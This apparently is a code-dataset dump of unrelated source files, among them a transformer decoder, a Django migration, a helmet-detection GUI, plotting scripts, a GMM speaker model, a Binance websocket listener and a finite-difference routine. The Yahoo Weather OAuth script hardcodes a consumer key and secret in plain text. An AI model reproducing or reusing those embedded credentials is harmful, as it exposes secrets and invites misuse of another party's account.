self.normalize_before:\n dec_output = self.after_norm(dec_output)\n\n logits = self.output_project(dec_output)\n loss = self.crit(logits, targets)\n\n return loss\n\n def predict(self, targets):\n\n dec_output = self.embedding(targets)\n dec_output = self.pos_embedding(dec_output)\n\n dec_mask = get_seq_mask(targets)\n\n for _, block in enumerate(self.blocks):\n dec_output, dec_mask = block(dec_output, dec_mask)\n\n if self.normalize_before:\n dec_output = self.after_norm(dec_output)\n\n logits = self.output_project(dec_output)\n\n log_probs = F.log_softmax(logits[:, -1, :].unsqueeze(1), dim=-1)\n return log_probs\n","sub_path":"otrans/model/lm.py","file_name":"lm.py","file_ext":"py","file_size_in_byte":2840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"650290069","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('man', '0005_lectiveyear'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='class',\n name='lective_year',\n field=models.ForeignKey(default=1, to='man.LectiveYear'),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='tsubject',\n name='lective_year',\n field=models.ForeignKey(default=1, to='man.LectiveYear'),\n preserve_default=False,\n ),\n ]\n","sub_path":"schoolman - Copy/man/migrations/0006_auto_20150804_1246.py","file_name":"0006_auto_20150804_1246.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"287270825","text":"# -*- coding: utf-8 -*-\nimport sys\nimport os\nif hasattr(sys, 'frozen'):\n os.environ['PATH'] = sys._MEIPASS + \";\" + os.environ['PATH']\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtCore import QFileInfo\nfrom PyQt5.QtWidgets import QFileDialog\nimport gluoncv as gcv\nfrom mxnet import gluon\n#import time\nimport mxnet as mx\nimport cv2\nimport win32com.client\nimport winsound\n\nclass Ui_Form(object):\n def setupUi(self, Form):\n Form.setObjectName(\"SafetyHelmetDetect\")\n Form.resize(520, 250)\n self.open_path_text = QtWidgets.QLineEdit(Form)\n self.open_path_text.setGeometry(QtCore.QRect(40, 30, 380, 30))\n self.open_path_text.setObjectName(\"open_path_text\")\n self.open_path_but = QtWidgets.QPushButton(Form)\n self.open_path_but.setGeometry(QtCore.QRect(430, 30, 75, 30))\n self.open_path_but.setObjectName(\"open_path_but\")\n \n self.textbox = QtWidgets.QLineEdit(Form)\n self.textbox.setGeometry(QtCore.QRect(40, 70, 380, 30))\n self.textbox.setObjectName(\"textbox\")\n self.button = QtWidgets.QPushButton(Form)\n self.button.setGeometry(QtCore.QRect(430, 70, 75, 30))\n self.button.setObjectName(\"button\")\n\n self.quitbutton = QtWidgets.QPushButton(Form)\n self.quitbutton.setGeometry(QtCore.QRect(430, 110, 75, 30))\n self.quitbutton.setObjectName(\"quitbutton\")\n \n self.label = QtWidgets.QLabel(Form)\n self.label.setGeometry(QtCore.QRect(40, 90, 399, 90))\n self.label.setFont(QtGui.QFont(\"Roman times\", 12, QtGui.QFont.Bold))\n self.label.setText(\"Please select the video file input address\")\n\n self.label2 = QtWidgets.QLabel(Form)\n self.label2.setGeometry(QtCore.QRect(40, 120, 399, 120))\n self.label2.setFont(QtGui.QFont(\"Roman times\", 12, QtGui.QFont.Bold))\n self.label2.setText(\"Video format requirements are mp4 format\")\n\n\n self.label3 = QtWidgets.QLabel(Form)\n self.label3.setGeometry(QtCore.QRect(40, 150, 450, 150))\n self.label3.setFont(QtGui.QFont(\"Roman times\", 12, QtGui.QFont.Bold))\n self.label3.setText(\"Output files are saved in the Result directory\")\n\n self.retranslateUi(Form)\n QtCore.QMetaObject.connectSlotsByName(Form)\n \n def retranslateUi(self, Form):\n _translate = QtCore.QCoreApplication.translate\n Form.setWindowTitle(_translate(\"SafetyHelmetDetect\", \"SafetyHelmetDetect\"))\n self.open_path_text.setPlaceholderText(_translate(\"SafetyHelmetDetect\", \"Open the file address\"))\n self.open_path_but.setText(_translate(\"SafetyHelmetDetect\", \"Browse\"))\n self.open_path_but.clicked.connect(self.open_event)\n\n self.textbox.setPlaceholderText(\"show the video rtsp url address\")\n self.button.setText(\"Yes\")\n self.button.clicked.connect(self.on_click)\n self.quitbutton.setText(\"Quit\")\n self.quitbutton.clicked.connect(self.quit_click)\n\n\n def quit_click(self):\n sys.exit()\n\n \n def on_click(self):\n textboxValue = self.textbox.text()\n path = str(textboxValue)\n # print(path)\n if path is not None:\n self.detect(path)\n \n def open_event(self):\n _translate = QtCore.QCoreApplication.translate\n directory1 = QFileDialog.getOpenFileName(None, \"Select a file\", \"C:/\")\n # print(directory1)\n path = directory1[0]\n self.open_path_text.setText(_translate(\"SafetyHelmetDetect\", path))\n if path is not None:\n self.detect(path)\n\n def detect(self, path):\n classes = ['hat', 'person']\n ctx = mx.cpu()\n\n net = gluon.SymbolBlock.imports(symbol_file='./darknet53-symbol.json', input_names=['data'], param_file='./darknet53-0000.params', ctx=ctx)\n while True:\n cap = cv2.VideoCapture(path)\n i = -1\n T = 40\n while (cap.isOpened()):\n cap.set(cv2.CAP_PROP_POS_FRAMES, T)\n ret, frame = cap.read()\n if ret != True or ((cv2.waitKey(1) & 0xff == ord('q')) or (cv2.waitKey(1) & 0xff == 27)):\n break\n # Image pre-processing\n frame = mx.nd.array(cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)).astype('uint8')\n rgb_nd, scaled_frame = gcv.data.transforms.presets.yolo.transform_test(frame, short=512, max_size=700)\n\n # Run frame through network\n class_IDs, scores, bounding_boxes = net(rgb_nd)\n \n # Display the result\n scale = 1.0 * frame.shape[0] / scaled_frame.shape[0]\n img = gcv.utils.viz.cv_plot_bbox(frame.asnumpy(), bounding_boxes[0], scores[0], class_IDs[0], class_names=classes, scale=scale)\n gcv.utils.viz.cv_plot_image(img)\n cv2.waitKey(1)\n if [1.] in list(class_IDs[0].asnumpy()):\n # person confidences\n index_person = [i for i, x in enumerate(list(class_IDs[0].asnumpy())) if x == [1.]]\n list_scores = list(scores[0].asnumpy())\n person_scores = [list_scores[i] for i in index_person]\n if max(person_scores) > 0.4:\n i += 1\n # draw bounding boxes on picture\n cv2.imwrite('./results/' + str(i) + '.jpg', img[..., ::-1])\n self.beep()\n \n \n cap.release()\n #cv2.destroyAllWindows()\n\n def beep(self):\n speak = win32com.client.Dispatch('SAPI.SPVOICE')\n winsound.Beep(2019, 1000)\n speak.Speak('请戴上安全帽')\n\n\nif __name__ == \"__main__\":\n if not os.path.isdir('./results'):\n os.mkdir('./results')\n \n app = QtWidgets.QApplication(sys.argv)\n widget = QtWidgets.QWidget()\n ui = Ui_Form()\n ui.setupUi(widget)\n widget.show()\n sys.exit(app.exec_())\n \n","sub_path":"helmetdetect/helmetdetect.py","file_name":"helmetdetect.py","file_ext":"py","file_size_in_byte":6106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"438155655","text":"##PI pattern on line 33\ndef handle_dual_graph(self, words1, words2):\n words1.set_color(\"yellow\")\n words2.set_color(\"yellow\")\n connected = TextMobject(\"Connected\")\n connected.set_color(\"lightgreen\")\n not_connected = TextMobject(\"Not Connected\")\n not_connected.set_color(\"red\")\n for mob in connected, not_connected:\n mob.shift(self.points[3] + UP)\n\n self.play(*[\n ShowCreation(mob, run_time = 1.0)\n for mob in self.edges + self.vertices\n ])\n self.wait()\n for region in self.regions:\n self.set_color_region(region)\n self.add(words1)\n self.wait()\n self.reset_background()\n self.add(words2)\n\n region_pairs = it.combinations(self.graph.region_cycles, 2)\n for x in range(6):\n want_matching = (x%2 == 0)\n found = False\n while True:\n try:\n cycle1, cycle2 = next(region_pairs)\n except:\n return\n shared = set(cycle1).intersection(cycle2)\n if len(shared) == 2 and want_matching:\n break\n if len(shared) != 2 and not want_matching:\n break\n for cycle in cycle1, cycle2:\n index = self.graph.region_cycles.index(cycle)\n self.set_color_region(self.regions[index])\n if want_matching:\n self.remove(not_connected)\n self.add(connected)\n tup = tuple(shared)\n if tup not in self.graph.edges:\n tup = tuple(reversed(tup))\n edge = deepcopy(self.edges[self.graph.edges.index(tup)])\n edge.set_color(\"red\")\n self.play(ShowCreation(edge), run_time = 1.0)\n self.wait()\n self.remove(edge)\n else:\n self.remove(connected)\n self.add(not_connected)\n self.wait(2)\n self.reset_background()","sub_path":"evaluation/pi-set_1.py","file_name":"pi-set_1.py","file_ext":"py","file_size_in_byte":2070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"53538656","text":"import matplotlib.pyplot as pli # -> 시각화\nimport numpy as np # -> 데이터 분석\nimport math # -> 수학 관련 함수가 많음 파이, 절대값, 사인, 코사인\ny_or_Y = 'd'\nwhile y_or_Y != 'Y' and y_or_Y != 'y':\n shape = input('어떤 도형을 그릴까요?')\n if shape == '타원':\n a=input(\"타원을 그리겠습니다\\nx^2/a+y^2/b일때\\na를 입력해주세요\") \n b=input(\"타원을 그리겠습니다\\nx^2/a+y^2/b일때\\nb를 입력해주세요\")\n a=int(a) \n b=int(b)\n #x값 설정\n x = np.arange(0,math.sqrt(a)+0.01,0.00001)\n #y값 설정\n y=np.sqrt(b-b*x**2/a) \n #각 사분면에 대해 대칭이라는 점을 이용하여 점을 찍음\n pli.plot(x,y,'b')\n pli.plot(x,-y,'b')\n pli.plot(-x,-y,'b')\n pli.plot(-x,y,'b')\n pli.axis(\"equal\")\n pli.title('Ellipse')\n pli.grid(True)\n pli.gca().set_aspect(\"equal\")\n pli.show() \n\n elif shape == '쌍곡선':\n a=input(\"쌍곡선을 그리겠습니다\\nx^2/a+y^2/b=1일때\\na를 입력해주세요\")\n b=input(\"쌍곡선을 그리겠습니다\\nx^2/a+y^2/b=1일때\\nb를 입력해주세요\")\n asymptote=input(\"점근선을 표시할까요?\")#예 -> 점근선 표시\n a=int(a)\n b=int(b)\n x = np.arange(0,50,0.00001)\n asymptote_a=np.array(x*b/a)\n asymptote_b=np.array(-x*b/a)\n y=np.sqrt(-b+b*x**2/a)\n pli.plot(x,y,'k')\n pli.plot(x,-y,'k')\n pli.plot(-x,-y,'k')\n pli.plot(-x,y,'k')\n if asymptote == '예':\n pli.plot(x,asymptote_a,'--b')\n pli.plot(x,asymptote_b,'--b')\n pli.plot(-x,asymptote_a,'--b')\n pli.plot(-x,asymptote_b,'--b')\n pli.title('Hyperbolic')\n pli.axis(\"equal\")\n pli.grid(True)\n pli.gca().set_aspect(\"equal\")\n pli.show()\n\n elif shape == '포물선':\n a=input(\"포물선을 그리겠습니다 4p를 입력해주세요\")\n b=input(\"x축이 준선입니까? y축이 준선입니까?\")\n asymptote=input(\"준선을 표시할까요?\")\n a=int(a)\n if b == 'x' or b == 'x축':\n x = np.arange(-100,100,0.001)\n y = x**2/a\n pli.plot(x,y,'k')\n a = np.array([a/4 for i in range(0,200000)])\n if asymptote == '예':\n pli.plot(x,-a,'--b')\n if b == 'y' or b == 'y축':\n x = np.arange(-100,100,0.001)\n y = np.sqrt(x*a)\n pli.plot(x,y,'k')\n pli.plot(x,-y,'k')\n a = np.array([a/4 for i in range(0,200000)])\n if asymptote == '예':\n pli.plot(-a,x,'--b')\n pli.axis(\"equal\")\n pli.grid(True)\n pli.gca().set_aspect(\"equal\")\n pli.show()\n y_or_Y = input(\"종료하고싶다면 y나 Y를 눌러주세요\")","sub_path":"gihasuheng.py","file_name":"gihasuheng.py","file_ext":"py","file_size_in_byte":2885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"607088798","text":"import xml.etree.ElementTree as ET\nimport json\nmy_data = []\nmycont = 0\ndef extract_skeleton(path):\n global mycont\n tree = ET.parse(path)\n my_skeleton = []\n root = tree.getroot()\n\n for i,child in enumerate(root):\n # there are many skeletons tracked, each folder has only one skeleton Tracked\n if (i == 0) or True:\n #print(child)\n for option in child:\n if option.tag == \"Joints\":\n for joint in option:\n position = joint[0]\n #print(f'x={position[0].text}; y={position[1].text}; z={position[2].text}')\n x=position[0].text\n y=position[1].text\n z=position[2].text\n my_skeleton.append({\"x\": x, \"y\": y, \"z\":z})\n if ((mycont % 20 == 0) and (mycont<200)) or x=='0':\n pass\n #print(f'{path[-10:]} {x},{y},{z}')\n mycont = mycont + 1\n #print(len(my_skeleton))\n return my_skeleton\n\ndef run_sample():\n folder = 'dataset/Misc/KinectOutput40/Skeleton'\n folder = 'dataset/Fighting/KinectOutput106/Skeleton'\n\n from os import walk\n for (dirpath, dirnames, filenames) in walk(folder):\n for filename in filenames:\n my_data.append(extract_skeleton(f'{folder}/{filename}'))\n\n with open(\"skeletons.json\", \"w\") as write_file:\n json.dump(my_data, write_file)\n #print(f'{len(my_data)} frames saved')\n\n\nrun_sample()","sub_path":"skeleton_extractor.py","file_name":"skeleton_extractor.py","file_ext":"py","file_size_in_byte":1561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"460423619","text":"'''\n77. Combinations\n\nGiven two integers n and k, return all possible combinations of k numbers out of 1 ... n.\n\nIf n = 4 and k = 2, a solution is:\n\n[\n [2,4],\n [3,4],\n [2,3],\n [1,2],\n [1,3],\n [1,4],\n]\n'''\nimport itertools\n\nclass Solution(object):\n def combine(self, n, k):\n \"\"\"\n :type n: int\n :type k: int\n :rtype: List[List[int]]\n \"\"\"\n# Using itertools API:\n def __directed_combination(n, k):\n iterable = range(1, n + 1)\n for comb in itertools.combinations(iterable, k):\n yield list(comb)\n return list(__directed_combination(n, k))\n\n# Using generator:\n #def __directed_combination(n, k):\n # cnt, ans = 0, []\n # while cnt < n:\n # while _ in k:\n # yield cnt\n\n def combine_dfs(self, n, k):\n \"\"\"\n :type n: int\n :type k: int\n :rtype: List[List[int]]\n \"\"\"\n # idea: dfs backtricking solution (too slow...)\n def dfs(partial):\n print(len(partial))\n if len(partial) == k:\n res.append(partial) # main checking condition\n return\n if len(partial) > k:\n return\n # if not valid partial\n for n in nums:\n if n in partial or (partial and n > partial[-1]):\n continue # already in the partial list\n dfs(partial + [n]) # generate new dfs\n\n res = []\n nums = [i for i in range(1, n + 1)]\n dfs([])\n return res\n\nif __name__ == \"__main__\":\n res = Solution().combine_dfs(4, 2)\n print(res)\n\n\n\n\n","sub_path":"77_combinations.py","file_name":"77_combinations.py","file_ext":"py","file_size_in_byte":1656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"29843756","text":"from NeuralLayer import *\n\ndef sigmoid(x, deriv=False):\n import numpy as np\n\n if deriv:\n return x*(1-x)\n return 1/(1+np.exp(-x))\n\nclass NeuralNetwork:\n\n def __init__(self, neurons_numbers):\n \"\"\" \n Create a fully interconnected neural network\n \n :params neurons_numbers: Array of int. Each int represent the number of neuron in a single layer\n \"\"\"\n\n self.neurons_numbers = neurons_numbers\n self.layers = []\n\n for i in range(0, len(neurons_numbers) - 1):\n self.layers.append(NeuralLayer(neurons_numbers[i], neurons_numbers[i + 1]))\n\n def process(self, inputs):\n outputs = inputs\n\n for l in self.layers:\n outputs = l.process(outputs, sigmoid)\n \n return outputs\n\n\nif __name__ == \"__main__\":\n neurons = [5, 4, 3, 2]\n network = NeuralNetwork(neurons)\n\n inputs = [0.1, 0.5, 0.9, 0.4, 0.33]\n network.process(inputs)","sub_path":"Neural Network/Structure/NeuralNetwork.py","file_name":"NeuralNetwork.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"46723236","text":"\nimport pygame, random\n# Let's import the Car Class\nfrom car import Car\n\npygame.init()\n\nGREEN = (20, 255, 140)\nGREY = (210, 210, 210)\nWHITE = (255, 255, 255)\nRED = (255, 0, 0)\nPURPLE = (255, 0, 255)\n\nSCREENWIDTH = 400\nSCREENHEIGHT = 500\n\nsize = (SCREENWIDTH, SCREENHEIGHT)\nscreen = pygame.display.set_mode(size)\npygame.display.set_caption(\"Car Racing\")\n\n# This will be a list that will contain all the sprites we intend to use in our game.\nall_sprites_list = pygame.sprite.Group()\n\nplayerCar = Car(RED, 20, 30)\nplayerCar.rect.x = 200\nplayerCar.rect.y = 300\n\n# Add the car to the list of objects\nall_sprites_list.add(playerCar)\n\n# Allowing the user to close the window...\ncarryOn = True\nclock = pygame.time.Clock()\n\nwhile carryOn:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n carryOn = False\n\n # Game Logic\n all_sprites_list.update()\n\n # Drawing on Screen\n screen.fill(GREEN)\n\n # Now let's draw all the sprites in one go. (For now we only have 1 sprite!)\n all_sprites_list.draw(screen)\n\n # Refresh Screen\n pygame.display.flip()\n\n # Number of frames per secong e.g. 60\n clock.tick(60)\n\npygame.quit()","sub_path":"test/Classwork.py","file_name":"Classwork.py","file_ext":"py","file_size_in_byte":1169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"495842739","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jun 10 16:52:08 2019\n\n@author: \n Jan Brekelmans\n j.j.w.c.brekelmans@gmail.com\n\"\"\"\n\nNUMBER = 1000\n\ndef compute():\n \n total = 0\n \n for a in range(1,NUMBER):\n for b in range(a,NUMBER):\n c = NUMBER - a - b\n \n if a*a + b*b == c*c:\n if total < a*b*c:\n total = a*b*c\n \n \n return str(total)\n \n \nif __name__ == \"__main__\":\n print(compute())","sub_path":"Python/projectEuler009.py","file_name":"projectEuler009.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"323670412","text":"from main import db\nimport pprint\n\nclass Event(db.Model):\n __tablename__ = 'event'\n id = db.Column(db.Integer, primary_key=True)\n title = db.Column(db.String, nullable=False)\n type_id = db.Column(db.String, nullable=False)\n\n abstract = db.Column(db.String, nullable=True)\n speaker_names = db.Column(db.String, nullable=True)\n start_time = db.Column(db.DateTime, nullable=True)\n end_time = db.Column(db.DateTime, nullable=True)\n location_id = db.Column(db.Integer, nullable=True)\n location_name = db.Column(db.String, nullable=True)\n\n def __init__(self, id, title, type_id):\n self.id = id\n self.title = title\n self.type_id = type_id\n\n def matches_day(self, day_of_month):\n if day_of_month == 0:\n return self.start_time == None\n else:\n if not self.start_time:\n return False\n return int(self.start_time.strftime('%d')) == day_of_month\n\n\n\n","sub_path":"models/event.py","file_name":"event.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"186710906","text":"# -*- coding: utf-8 -*-\r\n\r\nimport os\r\nimport numpy as np\r\nfrom sklearn import mixture\r\nimport random\r\n\r\nname = 'ubm-female'\r\nconv_t = 'diag'\r\n\r\ndirname = 'E:\\\\Data\\\\mozilla-dataset\\\\GMM-UBM\\\\traindata'\r\n\r\nif name == 'ubm':\r\n dirname = os.path.join(dirname, 'traindata')\r\nif name == 'ubm-male':\r\n dirname = os.path.join(dirname, 'traindata-male')\r\nif name == 'ubm-female':\r\n dirname = os.path.join(dirname, 'traindata-female')\r\n\r\nfilelist = os.listdir(dirname)\r\n\r\ntrain = list()\r\n\r\nfor f in filelist:\r\n print(f)\r\n filename = os.path.join(dirname, f)\r\n mfccs = np.load(filename)\r\n train.extend(mfccs.tolist())\r\n\r\ngmm = mixture.GaussianMixture(n_components=64, max_iter=200, covariance_type=conv_t, \r\n verbose=1, verbose_interval=10)\r\ngmm.fit(train)\r\n\r\nnp.save('E:\\\\Data\\\\mozilla-dataset\\\\GMM-UBM\\\\gmm\\\\' + name, [gmm])","sub_path":"GMM-UBM/ubm.py","file_name":"ubm.py","file_ext":"py","file_size_in_byte":866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"544569807","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed May 31 15:40:12 2017\n@author: hsdicicco\n\nUsed as a space to learn / understand matplotlib contour plotting.\n\"\"\"\n\nimport matplotlib\nimport numpy as np\nimport matplotlib.cm as cm\nimport matplotlib.mlab as mlab\nimport matplotlib.pyplot as plt\n\nmatplotlib.rcParams['xtick.direction'] = 'out'\nmatplotlib.rcParams['ytick.direction'] = 'out'\n\ndelta = 0.025\nx = np.arange(-3.0,3.0, delta)\ny = np.arange(-3.0,3.0, delta) \nX,Y = np.meshgrid(x,y)\nZ1 = mlab.bivariate_normal(X,Y,1.0,1.0,0.0,0.0)\nZ2 = mlab.bivariate_normal(X,Y,1.5,0.5,1,1)\n\nZ = 10.0 * (Z2-Z1)\n\ndef simplestWithLabels():\n plt.figure()\n CS = plt.contour(X,Y,Z)\n plt.clabel(CS, inline=1, fontsize=10)\n plt.title('Simplest default with labels')\n plt.show()\n\ndef manualLabels(manual_locations):\n plt.figure()\n CS = plt.contour(X,Y,Z)\n plt.clabel(CS, inline = 1, fontsize = 10, manual = manual_locations)\n plt.title('labels at selected locations')\n plt.show()\n \ndef sameColor():\n plt.figure()\n CS = plt.contour(X,Y,Z,6,\n colors = 'k'\n )\n plt.clabel(CS, fontize = 9, inline = 1)\n plt.title('single color - neg. contours disabled')\n plt.show()\n \ndef colormap():\n # Or you can use a colormap to specify the colors; the default\n # colormap will be used for the contour lines\n plt.figure()\n im = plt.imshow(Z, interpolation='bilinear', origin='lower',\n cmap=cm.gray, extent=(-3, 3, -2, 2))\n levels = np.arange(-1.2, 1.6, 0.2)\n CS = plt.contour(Z, levels,\n origin='lower',\n linewidths=2,\n extent=(-3, 3, -2, 2))\n \n # Thicken the zero contour.\n zc = CS.collections[6]\n plt.setp(zc, linewidth=4)\n \n plt.clabel(CS, levels[1::2], # label every second level\n inline=1,\n fmt='%1.1f',\n fontsize=10)\n \n # make a colorbar for the contour lines\n CB = plt.colorbar(CS, shrink=0.8, extend='both')\n \n plt.title('Lines with colorbar')\n #plt.hot() # Now change the colormap for the contour lines and colorbar\n plt.flag()\n \n # We can still add a colorbar for the image, too.\n CBI = plt.colorbar(im, orientation='horizontal', shrink=0.8)\n \n # This makes the original colorbar look a bit out of place,\n # so let's improve its position.\n \n l, b, w, h = plt.gca().get_position().bounds\n ll, bb, ww, hh = CB.ax.get_position().bounds\n CB.ax.set_position([ll, b + 0.1*h, ww, h*0.8])\n \n \n plt.show()\n\nif __name__ == '__main__':\n #simplestWithLabels() \n colormap()\n #manualLabels([(-1,-1.4),(-0.62, -0.7),(-2,0.5),(1.7, 1.2),(2.0, 1.4),(2.4, 1.7)])\n","sub_path":"testingground/junk/contourplotting_TUTORIAL.py","file_name":"contourplotting_TUTORIAL.py","file_ext":"py","file_size_in_byte":2765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"536868229","text":"import time, uuid, urllib.request\nimport hmac, hashlib\nfrom base64 import b64encode\nimport simplejson\n\n\"\"\"\nBasic info\n\"\"\"\napp_id = '1iwjOr74'\nconsumer_key = 'dj0yJmk9QlByUXZXTWFaMWxNJmQ9WVdrOU1XbDNhazl5TnpRbWNHbzlNQS0tJnM9Y29uc3VtZXJzZWNyZXQmc3Y9MCZ4PTAx'\nconsumer_secret = 'ddbe645c629a0099229b3e226d3bc46285bf5794'\nurl = 'https://weather-ydn-yql.media.yahoo.com/forecastrss'\nmethod = 'GET'\nconcat = '&'\nquery = {'location': 'córdoba,ar', 'format': 'json', 'u': 'c'}\noauth = {\n 'oauth_consumer_key': consumer_key,\n 'oauth_nonce': uuid.uuid4().hex,\n 'oauth_signature_method': 'HMAC-SHA1',\n 'oauth_timestamp': str(int(time.time())),\n 'oauth_version': '1.0'\n}\n\n#Prepare signature string (merge all params and SORT them)\n\nmerged_params = query.copy()\nmerged_params.update(oauth)\nsorted_params = [k + '=' + urllib.parse.quote(merged_params[k], safe='') for k in sorted(merged_params.keys())]\nsignature_base_str = method + concat + urllib.parse.quote(url, safe='') + concat + urllib.parse.quote(concat.join(sorted_params), safe='')\n\n#Generate signature\n\ncomposite_key = urllib.parse.quote(consumer_secret, safe='') + concat\noauth_signature = b64encode(hmac.new(composite_key.encode('utf-8'), signature_base_str.encode('utf-8'), hashlib.sha1).digest())\n\n#Prepare Authorization header\n\noauth['oauth_signature'] = oauth_signature.decode('utf-8')\nauth_header = 'OAuth ' + ', '.join(['{}=\"{}\"'.format(k,v) for k,v in oauth.items()])\n\n#Send request\n\nurl = url + '?' + urllib.parse.urlencode(query)\nrequest = urllib.request.Request(url)\nrequest.headers['Authorization'] = auth_header\nrequest.headers['X-Yahoo-App-Id']= app_id\nresponse = urllib.request.urlopen(request).read()\n\nr = simplejson.loads(response.decode('utf-8'))\n\nprint('Location : ' + r['location']['city'])\nprint('Country : ' + r['location']['country'])\nprint('WOEID : ' + str(r['location']['woeid']))\n","sub_path":"Twittalking/get_woeid.py","file_name":"get_woeid.py","file_ext":"py","file_size_in_byte":1869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"640166618","text":"from binance import ThreadedWebsocketManager\n\nsymbol = \"BTCUSDT\"\n\ntwm = ThreadedWebsocketManager()\ntwm.start()\n\ndef handle_socket_message(msg):\n print(msg)\n\n\"\"\"\nFrequencies:\n 1000ms(default) or 100ms\n\nSnapshot Depth Update: \n https://binance-docs.github.io/apidocs/spot/en/#partial-book-depth-streams \n @depth\n @depth@100ms\n\nDelta Depth Update: \n https://binance-docs.github.io/apidocs/spot/en/#diff-depth-stream\n @depth \n @depth@100ms\n\"\"\"\n\n\"\"\"\nSnapshot Update:\n symbol@depth5@100ms\n\"\"\"\ntwm.start_depth_socket(callback=handle_socket_message, symbol=symbol, depth=5, interval=100)\n\"\"\"\nDelta Update:\n symbol@depth@100ms\n\"\"\"\ntwm.start_depth_socket(callback=handle_socket_message, symbol=symbol, interval=100)\n\ntwm.join()\ntwm.stop()\n\n","sub_path":"scripts/202109102202.py","file_name":"202109102202.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"315353698","text":"# _*_ coding: utf-8 _*_\n\n\"\"\"\n Calculate grid derivative.\n\"\"\"\n\nimport numpy as np\nfrom dk_met_base.arr import conform_dims\n\n\ndef center_finite_diff_n(grid, dim=1, r=None, map_scale=None,\n cyclic=False, second=False):\n \"\"\"\n Performs a centered finite difference operation on the given dimension.\n\n using:\n Central finite difference scheme second order for first derivatives\n (u[i+1]-u[i-1])/(2dx)\n Central finite difference scheme second order for second derivatives\n (u[i+1]+u[i-1]-2*u[i])/(dx*dx)\n\n reference:\n http://www.cfm.brown.edu/people/jansh/resources/APMA1180/fd.pdf\n\n notice: for second derivatives, ensure equal interval.\n\n :param grid: a multi-dimensional numpy array.\n :param r: A scalar, one-dimensional, or multi-dimensional array containing\n the coordinates along which grid is to be difference. Does need\n not be equally spaced from a computational point of view.\n >scalar: r assumed to be the (constant) distance between\n adjacent points.\n >one-dimensional (and the same size as the dimension of\n grid): applied to all dimensions of grid.\n >multi-dimensional: then it must be the same size as grid.\n :param dim: A scalar integer indicating which dimension of grid to\n calculate the center finite difference on.\n Dimension numbering starts at 1, default=1.\n :param map_scale: map scale coefficient, a scalar, one-dimensional,\n or multi-dimensional array like r.\n :param cyclic: cyclic or periodic boundary.\n :param second: calculate second derivatives, default is first derivatives.\n :return: finite difference array.\n \"\"\"\n\n # move specified dimension to the first\n p = np.arange(grid.ndim)\n p[-1] = dim - 1\n p[dim-1] = -1\n grid = np.transpose(grid, p)\n\n # construct shift vector\n sf = np.arange(grid.ndim)\n sf[0] = -1\n sb = np.arange(grid.ndim)\n sb[0] = 1\n\n # check coordinates\n if r is not None:\n if len(r) == 1:\n rr = np.arange(grid.shape[0], dtype=np.float) * r\n else:\n rr = r\n if np.ndim(rr) == 1:\n rr = conform_dims(grid.shape, rr, [0])\n else:\n rr = np.transpose(rr, p)\n\n if map_scale is not None: # check map scale\n mps = map_scale\n if np.ndim(mps) == 1:\n mps = conform_dims(grid.shape, mps, [0])\n if np.ndim(mps) > 1:\n mps = np.transpose(mps, p)\n rr *= mps\n\n #\n # Compute center finite difference\n #\n\n # first derivative\n if not second:\n # value difference\n dgrid = np.roll(grid, -1, -1) - np.roll(grid, 1, -1)\n\n # grid space\n if r is not None:\n drr = np.roll(rr, -1, -1) - np.roll(rr, 1, -1)\n\n # deal boundary\n if cyclic:\n dgrid[..., 0] = grid[..., 1] - grid[..., -1]\n dgrid[..., -1] = grid[..., 0] - grid[..., -2]\n if r is not None:\n drr[..., 0] = 2*(rr[..., 1] - rr[..., 0])\n drr[..., -1] = 2*(rr[..., -1] - rr[..., -2])\n else:\n dgrid[..., 0] = grid[..., 1] - grid[..., 0]\n dgrid[..., -1] = grid[..., -1] - grid[..., -2]\n if r is not None:\n drr[..., 0] = rr[..., 1] - rr[..., 0]\n drr[..., -1] = rr[..., -1] - rr[..., -2]\n else:\n # value difference\n dgrid = np.roll(grid, -1, -1) - 2*grid + np.roll(grid, 1, -1)\n\n # grid space\n if r is not None:\n drr = (np.roll(rr, -1, -1) - rr) * (rr - np.roll(rr, 1, -1))\n\n # deal boundary\n if cyclic:\n dgrid[..., 0] = grid[..., 1] + grid[..., -1] - 2*grid[..., 0]\n dgrid[..., -1] = grid[..., 0] + grid[..., -2] - 2*grid[..., -1]\n if r is not None:\n drr[..., 0] = (rr[..., 1] - rr[..., 0]) * \\\n (rr[..., -1] - rr[..., -2])\n drr[..., -1] = drr[..., 0]\n else:\n dgrid[..., 0] = grid[..., 0] + grid[..., 